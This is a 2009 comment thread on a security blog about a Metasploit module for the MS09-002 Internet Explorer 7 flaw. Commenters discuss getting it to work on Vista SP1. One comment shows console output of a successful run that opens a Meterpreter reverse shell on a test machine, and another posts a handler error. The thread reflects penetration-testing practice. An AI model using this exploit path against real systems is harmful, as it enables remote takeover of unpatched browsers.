Comments on Carnal0wnage Blog: MS09_002 Memory Corruption Update
Comment feed, last updated 2024-01-24T04:15:08.086-05:00 (9 comments, newest first)

Anonymous, 2009-02-26T11:38:00-05:00:
solved my own prob, thanks!

Anonymous, 2009-02-26T11:21:00-05:00:
msf exploit(ms09_002_memory_corruption) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[-] Exploit failed: Permission denied - bind(2)

where's the prob? help!

Anonymous, 2009-02-23T14:32:00-05:00:
Oh yeah, that would be nice, being able to play with SP1 too! Please update the exploit to support SP1!

CG (https://www.blogger.com/profile/11061967917509053185), 2009-02-21T12:58:00-05:00:
well overwrite that shizzle with the SP1 version, i'm sure everyone won't mind :-)

Anonymous, 2009-02-21T12:23:00-05:00:
oddly, mine and the committed module look the same?

With some slight modifications to the heap code, exploitation on IE7/Vista SP1 is possible.

msf exploit(ms09_002_deleteobject) > rexploit
[*] Exploit running as background job.
msf exploit(ms09_002_deleteobject) >
[*] Handler binding to LHOST 172.10.1.103
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/vistasp1
[*] Local IP: http://172.10.1.103:8080/vistasp1
[*] Server started.
[*] Target is Windows Vista
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Overflow to 172.10.1.105:49277...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.10.1.103:65535 -> 172.10.1.105:49278)

msf exploit(ms09_002_deleteobject) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: DA-RIZZLE
OS : Windows 2000 (Build 6001, Service Pack 1).
meterpreter >

Anonymous, 2009-02-20T14:44:00-05:00:
Building up the Vista sp1 image as we speak. I'll get back to you asap.

Hmmm... just tried it, does not seem to work on a test computer running SP1... doing further testing as I don't know if it has the ie7 fix installed.

Anonymous, 2009-02-20T14:38:00-05:00:
Building up the Vista sp1 image as we speak. I'll get back to you asap.

dean de beer (https://www.blogger.com/profile/13744345182407258839), 2009-02-20T14:25:00-05:00:
I did not have a Vista SP1 image to test it on, but try it. The ret used (0x0C..) should be the same. Does sp1 enable opt-out mode for DEP by default? That would include IE7 then, I think, and that will break the sploit.

Let me know how it goes.

Anonymous, 2009-02-20T14:14:00-05:00:
Thanks for the heads up!

Wondering, is this exploit only possible on an SP0 version of Vista, or could it work on SP1 too? (Considering the ie7 fix hasn't been applied yet...)